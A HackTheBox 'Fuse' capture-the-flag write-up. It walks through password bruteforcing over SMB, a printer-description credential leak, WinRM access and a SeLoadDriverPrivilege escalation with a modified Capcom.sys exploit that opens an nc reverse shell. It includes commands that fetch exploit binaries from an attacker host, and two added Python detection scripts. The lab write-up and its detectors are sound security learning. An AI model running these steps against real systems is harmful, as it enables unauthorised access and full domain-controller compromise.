Hackthebox – Fuse

As with any box, I started Fuse with several portscans

root@kalivm:~/Fuse# nmap -oN fullscan-A -A 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 11:49 CEST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.065s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-19 10:07:06Z)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
464/tcp open  kpasswd5?
593/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEDC88B%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m01s, deviation: 4h02m39s, median: 16m55s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-19T03:07:43-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported 
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-19T10:07:42
|_  start_date: 2020-06-19T10:06:51

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   14.40 ms  10.10.14.1 (10.10.14.1)
2   ... 21
22  897.73 ms 10.10.14.1 (10.10.14.1)
23  897.48 ms 10.10.14.1 (10.10.14.1)
24  897.31 ms 10.10.14.1 (10.10.14.1)
25  897.08 ms 10.10.14.1 (10.10.14.1)
26  ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.11 seconds

A standard Windows domain-controller setup with LDAP and SMB, but also port 80 for a web server. Using the regular tools (enum4linux, ldapsearch) I did not get anything useful yet, so I decided to take a look at the website, which turned out to be quite useful.
[Screenshot: website not found on IP address]
At first, when I opened the IP address in my browser, it immediately redirected to fuse.fabricorp.local. Since I did not have that entry in my hosts file yet, a page-not-found error occurred.
[Screenshot: PaperCut Print Logger web page]
After putting the hostname and IP address combination in the /etc/hosts file, the page did resolve and showed a PaperCut Print Logger. Print servers are usually a goldmine of information, so it was time to see whether the CTF creator had replicated this experience.
[Screenshot: PaperCut CSV export file]
The creator did a pretty good job: a nice set of usernames to be found, and also one reference to a possible password, all nicely exportable to CSV files. After putting the usernames in a users file and Fabricorp01 as potential password in a passwords file, I decided to use msf to check whether any of the username/password combinations would work.

root@kalivm:~/Fuse# msfconsole 
---snip---
msf5 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner

msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > set user_file users
user_file => users
msf5 auxiliary(scanner/smb/smb_login) > set pass_file passwords
pass_file => passwords
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\sthompson:Fabricorp01',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\pmerton:Fabricorp01',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\administrator:Fabricorp01',
[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This appeared to be the right approach, as I now had at least 3 accounts I could use: bnielson, tlavel and bhult.

root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

However, for each of these users I got a ‘password must change’ message, which blocked the login.
After a short search on how to change a Windows password from a Linux machine, I found that smbpasswd could do this.

root@kalivm:~/Fuse# smbpasswd -r 10.10.10.193 bnielson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.

So there I changed the password from Fabricorp01 to Fabricorp011, and it appeared successful.

root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        prnproc$        Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

After a quick check it was indeed successful, but after a minute or so the login was back to the old ‘Password Must Change’ error with the old password. Apparently there is a script running that resets the password so that other people on HTB can exploit the machine as well. A good thing, but quite annoying. After some searching around I got kind of stuck and asked on Discord for a quick nudge, where someone pointed me to RPC as the protocol to use. Since port 135 is open this should have been obvious, but to me it wasn’t (yet). So I decided to reset bnielson’s password once more (I was at Fabricorp019 already) and try RPC.

root@kalivm:~/Fuse# rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password: 
rpcclient $>

That worked too! Nice, but what could I do with this? Simply typing help already gave an extensive list of commands, including several ‘enum’ commands. Enumeration is always key, so I started with enumdomusers to see whether there were more accounts to be found.

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

dmuir, astein, mberbatov, dandrews and two svc accounts to be added to the list. Nice, but smb_login did not give much more with the Fabricorp01 password. After some additional enumeration commands, I got to the enumprinters command.

rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

With this command a scan2docs password was displayed, so I decided to run the smb_login check once more.

msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bnielson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\sthompson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\pmerton:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\dandrews:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\mberbatov:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\dmuir:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\administrator:$fab@s3Rv1ce$1',
[*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And there I had two additional accounts, using the password from the enumprinters output.
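The leak above is a configuration problem rather than a software bug: printer description and comment fields are readable by any authenticated domain user over spoolss and LDAP, so a password placed there is effectively shared with the whole domain. The following is an added example, not part of the original write-up, that parses rpcclient enumprinters output and flags credential-looking strings in those fields so an administrator can audit a print server before someone else does. The sample output is constructed here, modelled on the record shown above.

```python
import re

# Constructed sample of `rpcclient enumprinters` output: the first record
# mirrors the one in this write-up, the second is a clean printer.
SAMPLE_ENUMPRINTERS = r"""
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]
        flags:[0x800000]
        name:[\\10.10.10.193\LOBBY-01]
        description:[\\10.10.10.193\LOBBY-01,Generic PCL,Lobby]
        comment:[Toner ordered 2020-06]
"""

# rpcclient prints each attribute as "key:[value]"; values may contain
# brackets and backslashes, so match greedily up to the final "]".
FIELD_RE = re.compile(r"^\s*(\w+):\[(.*)\]\s*$")
# Heuristic for "password: xxx", "pwd=xxx", "secret: xxx"; the value stops at
# whitespace, a comma or a closing parenthesis (the leak above ends with ")").
CRED_RE = re.compile(r"\b(pass(?:word|wd)?|pwd|secret)\b\s*[:=]\s*([^\s,)]+)",
                     re.IGNORECASE)

def parse_enumprinters(text):
    """Group the flat key:[value] lines into one dict per printer."""
    printers, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "flags":          # every printer record starts with flags
            current = {}
            printers.append(current)
        if current is not None:
            current[key] = value
    return printers

def find_credential_leaks(printers):
    """Return (printer name, field, keyword, value) for each suspected secret."""
    findings = []
    for p in printers:
        for field in ("description", "comment", "location"):
            for m in CRED_RE.finditer(p.get(field, "")):
                findings.append((p.get("name", "?"), field,
                                 m.group(1).lower(), m.group(2)))
    return findings

if __name__ == "__main__":
    for name, field, kw, value in find_credential_leaks(parse_enumprinters(SAMPLE_ENUMPRINTERS)):
        print(f"[!] {name}: '{kw}' found in {field}: {value}")
```

The same regex can be pointed at the printQueue objects in Active Directory (the description and location attributes) to cover printers that are published but not enumerable over SMB.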

root@kalivm:~/Fuse# evil-winrm -u svc-print -i 10.10.10.193
Enter Password:

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

PS C:\Users\svc-print\Documents> 

After some trial and error on various services, I finally found out that the svc-print account also provides access through WinRM. Perhaps this finally provides me with the user flag.

PS C:\Users\svc-print\Documents> cd ../Desktop
PS C:\Users\svc-print\Desktop> type user.txt
2edea93<NOFLAG>e4898c8621d2ed02d

And there’s the user flag, time for privilege escalation.

Privilege Escalation

After obtaining the flag, I started browsing around the system but did not find much useful information yet. The normal privilege escalation analysis did not lead to anything exploitable, and the only thing kind of worthwhile was a readme.txt file in the root of the system.

PS C:\> cat readme.txt
// MFT printing format issue
note to HP engineer:
The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.
This is a production environment and the "solution" should be developed and confirmed working in your testbed
All changes will be reverted every 2 mins.

So apparently there is something to do with printer issues. However, I got kind of stuck at this point, until someone on Discord nudged me to look closely at the whoami /all output.

PS C:\test> whoami /all 

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104

---snip---

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

At first the output did not look all that useful, until I compared it to the output on another Windows box. It appeared that the SeLoadDriverPrivilege had been added to the svc-print account. The first hit on Google for exploiting this privilege got me to this blog post on Tarlogic. In that blog post, both EoPLoadDriver.exe and the Capcom driver exploit are linked, which required compiling some C++ code. As I had not done this in a very long time (13+ years), I was kind of lost in the Visual Studio interface.

After watching some YouTube videos and reading some docs, I finally managed to get EoPLoadDriver.exe compiled. One of the most frustrating discoveries was that if you use existing code, Visual Studio completely ignores the files in the project and only looks for its includes (such as stdafx.h) in the location of the original .cpp file.
[Screenshot: compiling the EoPLoadDriver exploit basis]
I also analyzed the Capcom exploit and noticed it spawned a cmd box on the target. As I would not have an RDP login on the machine, this would make the exploit rather useless, so I looked for alternative ways to use it. During that research, I was also nudged towards this GitHub page for the original Capcom.sys exploit driver.
[Screenshot: compiling the modified Capcom exploit basis]
I modified the command line so that it calls nc.exe and sends a reverse shell back to my own system, and I also changed the CreateProcess call to use CREATE_NO_WINDOW so that it does not spawn a command box. I compiled that into another .exe too and transferred all files to my Kali machine.

PS C:\test> powershell iwr -uri http://10.10.14.2:8000/EOPL.exe -outfile EOPL.exe
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/Capcom.sys -outfile capcom.sys
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/ExploitCapcom.exe -outfile capcom.exe
PS C:\test> powershell IWR -uri http://10.10.14.2:8000/windows/nc.exe -outfile c:\windows\temp\nc.exe

I transferred all files to the target system. Knowing that the test directory could be used, I stored everything except the nc.exe file in that location.

PS C:\test> ./EOPL.exe System\CurrentControlSet\MyService c:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

I ran EOPL.exe with the capcom.sys file and, after several attempts, finally saw it report NTSTATUS: 00000000, meaning all had gone well. (I had seen various errors, which are all nicely explained by Microsoft here.)
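The loader output above is also the detection hook: a non-admin holder of SeLoadDriverPrivilege cannot write to HKLM\System\CurrentControlSet\Services, so EoPLoadDriver-style tooling defines the service under the caller's own user hive and hands NtLoadDriver a \Registry\User\<SID>\... path. Legitimate drivers are never registered there. The following is an added example, not part of the original write-up or of either tool, that runs that rule over Sysmon Event ID 13 (RegistryEvent SetValue) records; the event records, the field subset and the ImagePath/Type values are constructed here.

```python
import re

# Constructed Sysmon Event ID 13 records, reduced to the fields a SIEM
# forwards. The first two model a service being defined under the
# svc-print user hive (SID taken from the whoami output above), the third
# is a normal HKLM service write by the Service Control Manager.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": r"FABRICORP\svc-print", "Image": r"C:\test\EOPL.exe",
     "TargetObject": r"HKU\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService\ImagePath",
     "Details": r"\??\C:\test\capcom.sys"},
    {"EventID": 13, "User": r"FABRICORP\svc-print", "Image": r"C:\test\EOPL.exe",
     "TargetObject": r"HKU\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService\Type",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM", "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"%SystemRoot%\System32\spoolsv.exe"},
]

# Any service-style value written under HKU\<domain SID>\System\CurrentControlSet\<name>
USER_HIVE_SERVICE_RE = re.compile(
    r"^HKU\\(S-1-5-21-[\d-]+)\\System\\CurrentControlSet\\([^\\]+)\\(ImagePath|Type)$",
    re.IGNORECASE)
# Drivers normally live here; anything else is worth a second look.
DRIVER_DIR_RE = re.compile(r"^(\\\?\?\\)?C:\\Windows\\System32\\drivers\\", re.IGNORECASE)

def detect_user_hive_driver_registration(events):
    """Return one alert per (SID, service) defined in a user hive.
    Each alert carries the writing user/image, the values set and a
    'high' severity when ImagePath points outside the drivers folder."""
    alerts = {}
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = USER_HIVE_SERVICE_RE.match(ev.get("TargetObject", ""))
        if not m:
            continue
        sid, service, value = m.groups()
        alert = alerts.setdefault((sid, service), {
            "user": ev.get("User"), "image": ev.get("Image"),
            "values": {}, "severity": "medium"})
        alert["values"][value] = ev.get("Details", "")
        if value == "ImagePath" and not DRIVER_DIR_RE.match(alert["values"][value]):
            alert["severity"] = "high"
    return alerts

if __name__ == "__main__":
    for (sid, svc), a in detect_user_hive_driver_registration(SAMPLE_EVENTS).items():
        print(f"[{a['severity']}] {a['user']} via {a['image']} defined {svc} under {sid}: {a['values']}")
```

Sysmon only records these writes if its configuration includes a RegistryEvent rule covering HKU\*\System\CurrentControlSet; the rule itself is what this example assumes is in place.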

PS C:\test> .\capcom.exe 
[*] Capcom.sys exploit 
[*] Capcom.sys handle was obtained as 0000000000000064 
[*] Shellcode was placed at 000001D6EAF70008 
[+] Shellcode was executed 
[+] Token stealing was successful 
[+] The SYSTEM shell was launched 
[*] Press any key to exit this program

I ran the exploit with a listener ready in another terminal, and as this text scrolled by, I noticed this in the other terminal:

root@kalivm:~/Fuse# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.193 54788
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\test> 

So now I had a shell via the exploit, but I still had to verify that the exploit was successful.

PS C:\test> whoami
whoami
nt authority\system

Those are the highest privileges possible; all that is left is to obtain the flag!

PS C:\test> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c05c1df<NOFLAG>808892ff741e42890
